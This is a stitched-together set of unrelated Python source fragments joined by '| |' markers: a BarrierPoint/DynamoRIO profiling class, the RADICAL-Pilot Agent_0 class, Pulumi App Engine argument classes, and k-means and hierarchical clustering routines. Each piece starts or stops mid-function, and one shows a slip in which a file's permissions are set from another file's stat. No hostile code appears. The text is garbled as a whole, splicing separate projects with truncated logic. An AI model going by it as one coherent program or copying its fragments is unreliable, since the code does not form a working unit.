self.SPData['labels'].append(int(label))
self.SPData['match'].append(float(match))
_lfile.close()
except OSError as err:
self.logger.error('{} tLabels: {}'.format(err, self.tLabels))
return False
# Cleaning the files if needed:
if self.deleteSPOut:
for f in (self.tWeights, self.tSimPoints, self.tLabels):
try:
os.remove(f)
except:
self.logger.warn("File {} could not be removed".format(f))
return True
class BarrierPoints(object):
# Run analysis to obtain the barrier points
def __init__(self, miniApp, nthreads, appParams, outpath='./tmp', out_suffix='',
iteration=1, benchpath='./benchmarks', drpath=''):
# Define the logger
self.logger = logging.getLogger('BarrierPoint')
# Attributes & properties
self.miniApp = miniApp # miniApp name
self.nthreads = nthreads # number of threads
self.iteration = iteration # iteration run number, append to folder
# minimum length for barrier points (if 0, no minimum length)
self.benchpath = benchpath # Benchmark path
self.drpath = drpath # DynamoRIO path
self.out_suffix = out_suffix # Suffix for output folders
self.appParams = self.GetBenchParams(appParams, nthreads)
# path to store the output files
if out_suffix:
self._toolOutPath = "{}/{}-{}.{}t/{:0>3d}/".format(
outpath, miniApp, out_suffix, nthreads, iteration)
else:
self._toolOutPath = "{}/{}.{}t/{:0>3d}/".format(
outpath, miniApp, nthreads, iteration)
self.BBV_count = None # output file produced by BBV tool (1)
self.BBV_inscount = None # output file produced by BBV tool (2)
self.LDV_reuse = None # output file produced by LDV tool (1)
self.BP = None # output file produced by combining the above files
self.selectedBP = None # output file produced with selected barrier points
@property
def toolOutPath(self):
return self._toolOutPath
@toolOutPath.setter
def toolOutPath(self, toolOutPath):
self._toolOutPath = toolOutPath
def GetBenchPath(self, benchpath, miniApp):
if os.path.exists(benchpath + "/" + miniApp):
return benchpath + "/" + miniApp
else:
self.logger.error(
"App \"{}\" not found in benchpath {}".format(miniApp, benchpath))
return None
def GetBenchParams(self, appParams, nthreads):
# Substitutes {} in the config.json file for number of threads for execution
if "{}" in appParams:
return appParams.format(nthreads)
else:
return appParams
def __CreateVectors(self, dryRun=False):
# Runs the DR client to obtain the BBV/LDV for the application/nthreads
# Output files are stored in "toolOutPath"
# Use dryRun to just set up the proper vars, needed for SimPoints
if not os.path.isdir(self.toolOutPath):
try:
os.makedirs(self.toolOutPath)
except OSError:
self.logger.warn(
"CreateVectors could not create output path {}, \
storing results in local folder".format(self.toolOutPath))
self.toolOutPath = '.'
if self.out_suffix:
_opath = "{}/{}-{}.{}t".format(self.toolOutPath,
self.miniApp, self.out_suffix, self.nthreads)
else:
_opath = "{}/{}.{}t".format(self.toolOutPath,
self.miniApp, self.nthreads)
self.BBV_count = "{}.bbv_count.gz".format(_opath)
self.BBV_inscount = "{}.bbv_inscount.gz".format(_opath)
self.LDV_reuse = "{}.ldv_bb.gz".format(_opath)
# Set the DynamoRIO run command. Requires preload of libbp_dr.so
if not os.path.isfile("./dynamorio_client/build/libbarrierpoint.so"):
self.logger.warn(
"libbarrierpoint.so not found in {}".format("dynamorio_client/build/"))
return False
cmd = 'export LD_PRELOAD={} OMP_NUM_THREADS={} GOMP_CPU_AFFINITY=\"0-{}\"; '.format(
"./barrierpoint-libs/libbp_dr.so", self.nthreads, self.nthreads - 1)
cmd += self.drpath + \
"""/bin64/drrun -stderr_mask 15 -c ./dynamorio_client/build/libbarrierpoint.so \
-out_path {} -- {} {}""".format(
_opath, self.GetBenchPath(self.benchpath, self.miniApp), self.appParams)
self.logger.debug("Executing command: {}".format(cmd))
if not dryRun: # Runs the command
proc = subprocess.Popen(['bash', '-c', cmd])
proc.communicate()
if proc.returncode != 0:
self.logger.warn(
"Process {} return {} code".format(cmd, proc.returncode))
return False
return True
def __CombineBBVsandLDVs(self):
# Combines the BBVs and LDVs
for fn in [self.BBV_count, self.BBV_inscount, self.LDV_reuse]:
if not os.path.isfile(fn):
self.logger.error(
"Combining BBVs and LDVs: file {} not found".format(fn))
return False
if self.out_suffix:
# output file with BPVs
self.BP = "{}/{}-{}.{}t.bpv.gz".format(
self.toolOutPath, self.miniApp, self.out_suffix, self.nthreads)
# output file the selected BP and weights
self.selectedBP = "{}/{}-{}.{}t.barrierpoints".format(
self.toolOutPath, self.miniApp, self.out_suffix, self.nthreads)
else:
# output file with BPVs
self.BP = "{}/{}.{}t.bpv.gz".format(
self.toolOutPath, self.miniApp, self.nthreads)
# output file the selected BP and weights
self.selectedBP = "{}/{}.{}t.barrierpoints".format(
self.toolOutPath, self.miniApp, self.nthreads)
self.temporalSPfiles = self.selectedBP + '_'
# LDV_reuse file
_bbmax = 0
_total_reuse_per_phase = []
_reuse_data_per_phase = []
try:
_rfile = gzip.open(self.LDV_reuse, 'rt')
self.logger.debug('Reading LDV_reuse: {}'.format(self.LDV_reuse))
_rfile.readline() # skip first line 'W'
for _line in _rfile:
# Line Format: # T:1:43824 :2:4219 :3:4556 :4:527 :5:183 ...
_data = list(map(int, _line.split(':')[1:]))
# odd numbers represent the tread/reuse distance identifier (id)
# and even numbers represent the reuse histogram frequencies (freq)
_bbmax = max(_data[::2] + [_bbmax]) # max of the freq
# skip 'T', get the sum of all the freq
_total_reuse_per_phase.append(sum(_data[1::2]))
_reuse_data_per_phase.append(
zip(_data[::2], _data[1::2])) # tuples (id, freq)
_rfile.close()
except OSError as err:
self.logger.error('{} LDV_reuse: {}'.format(err, self.LDV_reuse))
return False
# BBV_inscount file
self.ins_per_phase = []
try:
_ifile = gzip.open(filename=self.BBV_inscount, mode='rt')
self.logger.debug(
'Reading BBV_inscount: {}'.format(self.BBV_inscount))
_line = _ifile.readline() # it corresponds to the ROI_start = first parallel region
for _line in _ifile:
# list of | |
__copyright__ = 'Copyright 2014-2016, http://radical.rutgers.edu'
__license__ = 'MIT'
import copy
import os
import pprint
import stat
import time
import radical.utils as ru
from .. import utils as rpu
from .. import states as rps
from .. import constants as rpc
from ..db import DBSession
from .resource_manager import ResourceManager
# ------------------------------------------------------------------------------
#
class Agent_0(rpu.Worker):
'''
This is the main agent. It starts sub-agents and watches them. If any of
the sub-agents die, it will shut down the other sub-agents and itself.
This class inherits the rpu.Worker, so that it can use its communication
bridges and callback mechanisms. Specifically, it will pull the DB for
new tasks to be exexuted and forwards them to the agent's component
network (see `work()`). It will also watch the DB for any commands to be
forwarded (pilot termination, task cancelation, etc), and will take care
of heartbeat messages to be sent to the client module. To do all this, it
initializes a DB connection in `initialize()`.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
self._uid = 'agent.0'
self._cfg = cfg
self._pid = cfg.pid
self._pmgr = cfg.pmgr
self._pwd = cfg.pilot_sandbox
self._session = session
self._log = ru.Logger(self._uid, ns='radical.pilot')
self._starttime = time.time()
self._final_cause = None
# this is the earliest point to sync bootstrap and agent profiles
self._prof = ru.Profiler(ns='radical.pilot', name=self._uid)
self._prof.prof('hostname', uid=cfg.pid, msg=ru.get_hostname())
# run an inline registry service to share runtime config with other
# agents and components
reg_uid = 'radical.pilot.reg.%s' % self._uid
self._reg_service = ru.zmq.Registry(uid=reg_uid)
self._reg_service.start()
# let all components know where to look for the registry
self._cfg['reg_addr'] = self._reg_service.addr
# connect to MongoDB for state push/pull
self._connect_db()
# configure ResourceManager before component startup, as components need
# ResourceManager information for function (scheduler, executor)
self._configure_rm()
# ensure that app communication channels are visible to workload
self._configure_app_comm()
# expose heartbeat channel to sub-agents, bridges and components,
# and start those
self._cmgr = rpu.ComponentManager(self._cfg)
self._cfg.heartbeat = self._cmgr.cfg.heartbeat
self._cmgr.start_bridges()
self._cmgr.start_components()
# start any services if they are requested
self._start_services()
# create the sub-agent configs and start the sub agents
self._write_sa_configs()
self._start_sub_agents() # TODO: move to cmgr?
# at this point the session is up and connected, and it should have
# brought up all communication bridges and components. We are
# ready to rumble!
rpu.Worker.__init__(self, self._cfg, session)
self.register_subscriber(rpc.CONTROL_PUBSUB, self._check_control)
# run our own slow-paced heartbeat monitor to watch pmgr heartbeats
# FIXME: we need to get pmgr freq
freq = 60
tint = freq / 3
tout = freq * 10
self._hb = ru.Heartbeat(uid=self._uid,
timeout=tout,
interval=tint,
beat_cb=self._hb_check, # no own heartbeat(pmgr pulls)
term_cb=self._hb_term_cb,
log=self._log)
self._hb.start()
# register pmgr heartbeat
self._log.info('hb init for %s', self._pmgr)
self._hb.beat(uid=self._pmgr)
# --------------------------------------------------------------------------
#
def _hb_check(self):
self._log.debug('hb check')
# --------------------------------------------------------------------------
#
def _hb_term_cb(self, msg=None):
self._cmgr.close()
self._log.warn('hb termination: %s', msg)
return None
# --------------------------------------------------------------------------
#
def _connect_db(self):
# Check for the RADICAL_PILOT_DB_HOSTPORT env var, which will hold
# the address of the tunnelized DB endpoint. If it exists, we
# overrule the agent config with it.
hostport = os.environ.get('RADICAL_PILOT_DB_HOSTPORT')
if hostport:
host, port = hostport.split(':', 1)
dburl = ru.Url(self._cfg.dburl)
dburl.host = host
dburl.port = port
self._cfg.dburl = str(dburl)
self._dbs = DBSession(sid=self._cfg.sid, dburl=self._cfg.dburl,
cfg=self._cfg, log=self._log)
# --------------------------------------------------------------------------
#
def _configure_rm(self):
# Create ResourceManager which will give us the set of agent_nodes to
# use for sub-agent startup. Add the remaining ResourceManager
# information to the config, for the benefit of the scheduler).
self._rm = ResourceManager.create(name=self._cfg.resource_manager,
cfg=self._cfg, log=self._log,
prof=self._prof)
self._log.debug(pprint.pformat(self._rm.info))
# --------------------------------------------------------------------------
#
def _configure_app_comm(self):
# if the pilot description contains a request for application comm
# channels, merge those into the agent config
#
# FIXME: this needs to start the app_comm bridges
app_comm = self._cfg.get('app_comm')
if app_comm:
if isinstance(app_comm, list):
app_comm = {ac: {'bulk_size': 0,
'stall_hwm': 1,
'log_level': 'error'} for ac in app_comm}
for ac in app_comm:
if ac in self._cfg['bridges']:
raise ValueError('reserved app_comm name %s' % ac)
self._cfg['bridges'][ac] = app_comm[ac]
# some of the bridge addresses also need to be exposed to the workload
if app_comm:
if 'task_environment' not in self._cfg:
self._cfg['task_environment'] = dict()
for ac in app_comm:
if ac not in self._cfg['bridges']:
raise RuntimeError('missing app_comm %s' % ac)
self._cfg['task_environment']['RP_%s_IN' % ac.upper()] = \
self._cfg['bridges'][ac]['addr_in']
self._cfg['task_environment']['RP_%s_OUT' % ac.upper()] = \
self._cfg['bridges'][ac]['addr_out']
# --------------------------------------------------------------------------
#
def initialize(self):
# registers the staging_input_queue as this is what we want to push
# tasks to
self.register_output(rps.AGENT_STAGING_INPUT_PENDING,
rpc.AGENT_STAGING_INPUT_QUEUE)
# register the command callback which pulls the DB for commands
self.register_timed_cb(self._agent_command_cb,
timer=self._cfg['db_poll_sleeptime'])
# register idle callback to pull for tasks
self.register_timed_cb(self._check_tasks_cb,
timer=self._cfg['db_poll_sleeptime'])
# sub-agents are started, components are started, bridges are up: we are
# ready to roll! Update pilot state.
pilot = {'type' : 'pilot',
'uid' : self._pid,
'state' : rps.PMGR_ACTIVE,
'resource_details' : {
# 'lm_info' : self._rm.lm_info.get('version_info'),
# 'lm_detail' : self._rm.lm_info.get('lm_detail'),
'rm_info' : self._rm.info},
'$set' : ['resource_details']}
self.advance(pilot, publish=True, push=False)
# --------------------------------------------------------------------------
#
def work(self):
# all work is done in the registered callbacks
time.sleep(1)
# --------------------------------------------------------------------------
#
def stage_output(self):
if os.path.isfile('./staging_output.txt'):
if not os.path.isfile('./staging_output.tgz'):
cmd = 'tar zcvf staging_output.tgz $(cat staging_output.txt)'
out, err, ret = ru.sh_callout(cmd, shell=True)
if ret:
self._log.debug('out: %s', out)
self._log.debug('err: %s', err)
self._log.error('output tarring failed: %s', cmd)
# --------------------------------------------------------------------------
#
def finalize(self):
# tar up output staging data
self._log.debug('stage output parent')
self.stage_output()
# tear things down in reverse order
self._hb.stop()
self._cmgr.close()
if self._rm:
self._rm.stop()
self._reg_service.stop()
if self._final_cause == 'timeout' : state = rps.DONE
elif self._final_cause == 'cancel' : state = rps.CANCELED
elif self._final_cause == 'sys.exit' : state = rps.CANCELED
else : state = rps.FAILED
# NOTE: we do not push the final pilot state, as that is done by the
# bootstrapper *after* this pilot *actually* finished.
with ru.ru_open('./killme.signal', 'w') as fout:
fout.write('%s\n' % state)
# we don't rely on the existence / viability of the update worker at
# that point.
self._log.debug('update db state: %s: %s', state, self._final_cause)
self._log.info('rusage: %s', rpu.get_rusage())
out, err, log = '', '', ''
try : out = ru.ru_open('./agent.0.out', 'r').read(1024)
except: pass
try : err = ru.ru_open('./agent.0.err', 'r').read(1024)
except: pass
try : log = ru.ru_open('./agent.0.log', 'r').read(1024)
except: pass
ret = self._dbs._c.update({'type' : 'pilot',
'uid' : self._pid},
{'$set' : {'stdout' : rpu.tail(out),
'stderr' : rpu.tail(err),
'logfile': rpu.tail(log),
'state' : state},
'$push': {'states' : state}
})
self._log.debug('update ret: %s', ret)
# --------------------------------------------------------------------
#
def _write_sa_configs(self):
# we have all information needed by the subagents -- write the
# sub-agent config files.
# write deep-copies of the config for each sub-agent (sans from agent.0)
for sa in self._cfg.get('agents', {}):
assert(sa != 'agent.0'), 'expect subagent, not agent.0'
# use our own config sans agents/components/bridges as a basis for
# the sub-agent config.
tmp_cfg = copy.deepcopy(self._cfg)
tmp_cfg['agents'] = dict()
tmp_cfg['components'] = dict()
tmp_cfg['bridges'] = dict()
# merge sub_agent layout into the config
ru.dict_merge(tmp_cfg, self._cfg['agents'][sa], ru.OVERWRITE)
tmp_cfg['uid'] = sa
tmp_cfg['aid'] = sa
tmp_cfg['owner'] = 'agent.0'
ru.write_json(tmp_cfg, './%s.cfg' % sa)
# --------------------------------------------------------------------------
#
def _start_services(self):
'''
If a `./services` file exist, reserve a compute node and run that file
there as bash script.
'''
if not os.path.isfile('./services'):
return
# launch the `./services` script on the service node reserved by the RM.
nodes = self._rm.info.service_node_list
assert(nodes)
bs_name = "%s/bootstrap_2.sh" % self._pwd
ls_name = "%s/services_launch.sh" % self._pwd
ex_name = "%s/services_exec.sh" % self._pwd
threads = self._rm.info.cores_per_node * \
self._rm.info.threads_per_core
service_task = {
'uid' : 'rp.services',
'task_sandbox_path': self._pwd,
'description' : {'cpu_processes' : 1,
'cpu_threads' : threads,
'gpu_processes' : 0,
'gpu_threads' : 0,
'executable' : '/bin/sh',
'arguments' : [bs_name, 'services']},
'slots': {'ranks' : [{'node_name' : nodes[0]['node_name'],
'node_id' : nodes[0]['node_id'],
'core_map' : [[0]],
'gpu_map' : [],
'lfs' : 0,
'mem' : 0}]}
}
launcher = self._rm.find_launcher(service_task)
if not launcher:
raise RuntimeError('no launch method found for sub agent')
tmp = '#!/bin/sh\n\n'
cmds = launcher.get_launcher_env()
for cmd in cmds:
tmp += '%s || exit 1\n' % cmd
cmds = launcher.get_launch_cmd(service_task, ex_name)
tmp += '%s\nexit $?\n\n' % '\n'.join(cmds)
with ru.ru_open(ls_name, 'w') as fout:
fout.write(tmp)
tmp = '#!/bin/sh\n\n'
tmp += '. ./env/service.env\n'
tmp += '/bin/sh -l ./services\n\n'
with ru.ru_open(ex_name, 'w') as fout:
fout.write(tmp)
# make sure scripts are executable
st = os.stat(ls_name)
st = os.stat(ex_name)
os.chmod(ls_name, st.st_mode | stat.S_IEXEC)
os.chmod(ex_name, st.st_mode | | |
text/html.
"""
return pulumi.get(self, "mime_type")
@mime_type.setter
def mime_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mime_type", value)
@property
@pulumi.getter(name="staticFile")
def static_file(self) -> Optional[pulumi.Input[str]]:
"""
Static file content to be served for this error.
"""
return pulumi.get(self, "static_file")
@static_file.setter
def static_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "static_file", value)
@pulumi.input_type
class FeatureSettingsArgs:
def __init__(__self__, *,
split_health_checks: Optional[pulumi.Input[bool]] = None,
use_container_optimized_os: Optional[pulumi.Input[bool]] = None):
"""
The feature specific settings to be used in the application. These define behaviors that are user configurable.
:param pulumi.Input[bool] split_health_checks: Boolean value indicating if split health checks should be used instead of the legacy health checks. At an app.yaml level, this means defaulting to 'readiness_check' and 'liveness_check' values instead of 'health_check' ones. Once the legacy 'health_check' behavior is deprecated, and this value is always true, this setting can be removed.
:param pulumi.Input[bool] use_container_optimized_os: If true, use Container-Optimized OS (https://cloud.google.com/container-optimized-os/) base image for VMs, rather than a base Debian image.
"""
if split_health_checks is not None:
pulumi.set(__self__, "split_health_checks", split_health_checks)
if use_container_optimized_os is not None:
pulumi.set(__self__, "use_container_optimized_os", use_container_optimized_os)
@property
@pulumi.getter(name="splitHealthChecks")
def split_health_checks(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean value indicating if split health checks should be used instead of the legacy health checks. At an app.yaml level, this means defaulting to 'readiness_check' and 'liveness_check' values instead of 'health_check' ones. Once the legacy 'health_check' behavior is deprecated, and this value is always true, this setting can be removed.
"""
return pulumi.get(self, "split_health_checks")
@split_health_checks.setter
def split_health_checks(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "split_health_checks", value)
@property
@pulumi.getter(name="useContainerOptimizedOs")
def use_container_optimized_os(self) -> Optional[pulumi.Input[bool]]:
"""
If true, use Container-Optimized OS (https://cloud.google.com/container-optimized-os/) base image for VMs, rather than a base Debian image.
"""
return pulumi.get(self, "use_container_optimized_os")
@use_container_optimized_os.setter
def use_container_optimized_os(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_container_optimized_os", value)
@pulumi.input_type
class HealthCheckArgs:
def __init__(__self__, *,
check_interval: Optional[pulumi.Input[str]] = None,
disable_health_check: Optional[pulumi.Input[bool]] = None,
healthy_threshold: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
restart_threshold: Optional[pulumi.Input[int]] = None,
timeout: Optional[pulumi.Input[str]] = None,
unhealthy_threshold: Optional[pulumi.Input[int]] = None):
"""
Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances. Only applicable for instances in App Engine flexible environment.
:param pulumi.Input[str] check_interval: Interval between health checks.
:param pulumi.Input[bool] disable_health_check: Whether to explicitly disable health checks for this instance.
:param pulumi.Input[int] healthy_threshold: Number of consecutive successful health checks required before receiving traffic.
:param pulumi.Input[str] host: Host header to send when performing an HTTP health check. Example: "myapp.appspot.com"
:param pulumi.Input[int] restart_threshold: Number of consecutive failed health checks required before an instance is restarted.
:param pulumi.Input[str] timeout: Time before the health check is considered failed.
:param pulumi.Input[int] unhealthy_threshold: Number of consecutive failed health checks required before removing traffic.
"""
if check_interval is not None:
pulumi.set(__self__, "check_interval", check_interval)
if disable_health_check is not None:
pulumi.set(__self__, "disable_health_check", disable_health_check)
if healthy_threshold is not None:
pulumi.set(__self__, "healthy_threshold", healthy_threshold)
if host is not None:
pulumi.set(__self__, "host", host)
if restart_threshold is not None:
pulumi.set(__self__, "restart_threshold", restart_threshold)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
if unhealthy_threshold is not None:
pulumi.set(__self__, "unhealthy_threshold", unhealthy_threshold)
@property
@pulumi.getter(name="checkInterval")
def check_interval(self) -> Optional[pulumi.Input[str]]:
"""
Interval between health checks.
"""
return pulumi.get(self, "check_interval")
@check_interval.setter
def check_interval(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "check_interval", value)
@property
@pulumi.getter(name="disableHealthCheck")
def disable_health_check(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to explicitly disable health checks for this instance.
"""
return pulumi.get(self, "disable_health_check")
@disable_health_check.setter
def disable_health_check(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_health_check", value)
@property
@pulumi.getter(name="healthyThreshold")
def healthy_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Number of consecutive successful health checks required before receiving traffic.
"""
return pulumi.get(self, "healthy_threshold")
@healthy_threshold.setter
def healthy_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "healthy_threshold", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host header to send when performing an HTTP health check. Example: "myapp.appspot.com"
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="restartThreshold")
def restart_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Number of consecutive failed health checks required before an instance is restarted.
"""
return pulumi.get(self, "restart_threshold")
@restart_threshold.setter
def restart_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "restart_threshold", value)
@property
@pulumi.getter
def timeout(self) -> Optional[pulumi.Input[str]]:
"""
Time before the health check is considered failed.
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timeout", value)
@property
@pulumi.getter(name="unhealthyThreshold")
def unhealthy_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Number of consecutive failed health checks required before removing traffic.
"""
return pulumi.get(self, "unhealthy_threshold")
@unhealthy_threshold.setter
def unhealthy_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "unhealthy_threshold", value)
@pulumi.input_type
class IdentityAwareProxyArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
oauth2_client_id: Optional[pulumi.Input[str]] = None,
oauth2_client_secret: Optional[pulumi.Input[str]] = None):
"""
Identity-Aware Proxy
:param pulumi.Input[bool] enabled: Whether the serving infrastructure will authenticate and authorize all incoming requests.If true, the oauth2_client_id and oauth2_client_secret fields must be non-empty.
:param pulumi.Input[str] oauth2_client_id: OAuth2 client ID to use for the authentication flow.
:param pulumi.Input[str] oauth2_client_secret: OAuth2 client secret to use for the authentication flow.For security reasons, this value cannot be retrieved via the API. Instead, the SHA-256 hash of the value is returned in the oauth2_client_secret_sha256 field.@InputOnly
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if oauth2_client_id is not None:
pulumi.set(__self__, "oauth2_client_id", oauth2_client_id)
if oauth2_client_secret is not None:
pulumi.set(__self__, "oauth2_client_secret", oauth2_client_secret)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the serving infrastructure will authenticate and authorize all incoming requests.If true, the oauth2_client_id and oauth2_client_secret fields must be non-empty.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="oauth2ClientId")
def oauth2_client_id(self) -> Optional[pulumi.Input[str]]:
"""
OAuth2 client ID to use for the authentication flow.
"""
return pulumi.get(self, "oauth2_client_id")
@oauth2_client_id.setter
def oauth2_client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "oauth2_client_id", value)
@property
@pulumi.getter(name="oauth2ClientSecret")
def oauth2_client_secret(self) -> Optional[pulumi.Input[str]]:
"""
OAuth2 client secret to use for the authentication flow.For security reasons, this value cannot be retrieved via the API. Instead, the SHA-256 hash of the value is returned in the oauth2_client_secret_sha256 field.@InputOnly
"""
return pulumi.get(self, "oauth2_client_secret")
@oauth2_client_secret.setter
def oauth2_client_secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "oauth2_client_secret", value)
@pulumi.input_type
class LibraryArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Third-party Python runtime library that is required by the application.
:param pulumi.Input[str] name: Name of the library. Example: "django".
:param pulumi.Input[str] version: Version of the library to select, or "latest".
"""
if name is not None:
pulumi.set(__self__, "name", name)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the library. Example: "django".
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Version of the library to select, or "latest".
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class LivenessCheckArgs:
def __init__(__self__, *,
check_interval: Optional[pulumi.Input[str]] = None,
failure_threshold: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
initial_delay: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
success_threshold: Optional[pulumi.Input[int]] = None,
timeout: Optional[pulumi.Input[str]] = None):
"""
Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances.
:param pulumi.Input[str] check_interval: Interval between health checks.
:param pulumi.Input[int] failure_threshold: Number of consecutive failed checks required before considering the VM unhealthy.
:param pulumi.Input[str] host: Host header to send when performing a HTTP Liveness check. Example: "myapp.appspot.com"
:param pulumi.Input[str] initial_delay: The initial delay before starting to execute the checks.
:param pulumi.Input[str] path: The request path.
:param pulumi.Input[int] success_threshold: Number of consecutive successful checks required before considering the VM healthy.
:param pulumi.Input[str] timeout: Time before the check is considered failed.
"""
if check_interval is not None:
pulumi.set(__self__, "check_interval", check_interval)
if failure_threshold is not None:
pulumi.set(__self__, "failure_threshold", failure_threshold)
if host is not None:
pulumi.set(__self__, "host", host)
if initial_delay is not None:
pulumi.set(__self__, "initial_delay", initial_delay)
if path is not None:
pulumi.set(__self__, "path", path)
if success_threshold is not None:
pulumi.set(__self__, "success_threshold", success_threshold)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
@property
@pulumi.getter(name="checkInterval")
def check_interval(self) -> Optional[pulumi.Input[str]]:
"""
Interval between health checks.
"""
return pulumi.get(self, "check_interval")
@check_interval.setter
def check_interval(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "check_interval", value)
@property
@pulumi.getter(name="failureThreshold")
def failure_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Number of consecutive failed checks required before considering the VM unhealthy.
"""
return pulumi.get(self, "failure_threshold")
@failure_threshold.setter
def failure_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_threshold", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host header to send when performing a HTTP Liveness check. Example: "myapp.appspot.com"
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="initialDelay")
def initial_delay(self) -> Optional[pulumi.Input[str]]:
"""
| |
i, v in enumerate(sorted(vectors, key=lambda x: random())):
# Randomly partition the vectors across k clusters.
clusters[i % int(k)].append(v)
# Cache the distance calculations between vectors (4x faster).
map = DistanceMap(method=distance); distance = map.distance
converged = False
while not converged and iterations > 0 and k > 0:
# Calculate the center of each cluster.
centroids = [centroid(cluster, keys) for cluster in clusters]
# Triangle inequality: one side is shorter than the sum of the two other sides.
# We can exploit this to avoid costly distance() calls (up to 3x faster).
p = 0.5 * kwargs.get("p", 0.8) # "Relaxed" triangle inequality (cosine distance is a semimetric) 0.25-0.5.
D = {}
for i in range(len(centroids)):
for j in range(i, len(centroids)): # center1–center2 < center1–vector + vector–center2 ?
D[(i,j)] = D[(j,i)] = p * distance(centroids[i], centroids[j])
# For every vector in every cluster,
# check if it is nearer to the center of another cluster (if so, assign it).
# When visualized, this produces a Voronoi diagram.
converged = True
for i in xrange(len(clusters)):
for v in clusters[i]:
nearest, d1 = i, distance(v, centroids[i])
for j in xrange(len(clusters)):
if D[(i,j)] < d1: # Triangle inequality (Elkan, 2003).
d2 = distance(v, centroids[j])
if d2 < d1:
nearest = j
if nearest != i: # Other cluster is nearer.
clusters[nearest].append(clusters[i].pop(clusters[i].index(v)))
converged = False
iterations -= 1; #print iterations
return clusters
kmeans = k_means
def kmpp(vectors, k, distance=COSINE):
""" The k-means++ initialization algorithm, with the advantage that:
- it generates better clusterings than standard k-means (RANDOM) on virtually all data sets,
- it runs faster than standard k-means on average,
- it has a theoretical approximation guarantee.
"""
# Cache the distance calculations between vectors (4x faster).
map = DistanceMap(method=distance); distance = map.distance
# <NAME>, 2006, http://theory.stanford.edu/~sergei/slides/BATS-Means.pdf
# Based on:
# http://www.stanford.edu/~darthur/kmpp.zip
# http://yongsun.me/2008/10/k-means-and-k-means-with-python
# Choose one center at random.
# Calculate the distance between each vector and the nearest center.
centroids = [choice(vectors)]
d = [distance(v, centroids[0]) for v in vectors]
s = sum(d)
for _ in range(int(k) - 1):
# Choose a random number y between 0 and d1 + d2 + ... + dn.
# Find vector i so that: d1 + d2 + ... + di >= y > d1 + d2 + ... + dj.
# Perform a number of local tries so that y yields a small distance sum.
i = 0
for _ in range(int(2 + log(k))):
y = random() * s
for i1, v1 in enumerate(vectors):
if y <= d[i1]:
break
y -= d[i1]
s1 = sum(min(d[j], distance(v1, v2)) for j, v2 in enumerate(vectors))
if s1 < s:
s, i = s1, i1
# Add vector i as a new center.
# Repeat until we have chosen k centers.
centroids.append(vectors[i])
d = [min(d[i], distance(v, centroids[-1])) for i, v in enumerate(vectors)]
s = sum(d)
# Assign points to the nearest center.
clusters = [[] for i in xrange(int(k))]
for v1 in vectors:
d = [distance(v1, v2) for v2 in centroids]
clusters[d.index(min(d))].append(v1)
return clusters
#--- HIERARCHICAL ----------------------------------------------------------------------------------
# Slow, optimal solution guaranteed in O(len(vectors)^3).
# 100 vectors with 6 features (density 1.0): 0.1 seconds.
# 1000 vectors with 6 features (density 1.0): 1 minute.
# 3000 vectors with 6 features (density 1.0): 15 minutes.
class Cluster(list):
def __init__(self, *args, **kwargs):
list.__init__(self, *args, **kwargs)
@property
def depth(self):
""" Yields the maximum depth of nested clusters.
Cluster((1, Cluster((2, Cluster((3, 4)))))).depth => 2.
"""
return max([0] + [1+n.depth for n in self if isinstance(n, Cluster)])
def flatten(self, depth=1000):
""" Flattens nested clusters to a list, down to the given depth.
Cluster((1, Cluster((2, Cluster((3, 4)))))).flatten(1) => [1, 2, Cluster(3, 4)].
"""
a = []
for item in self:
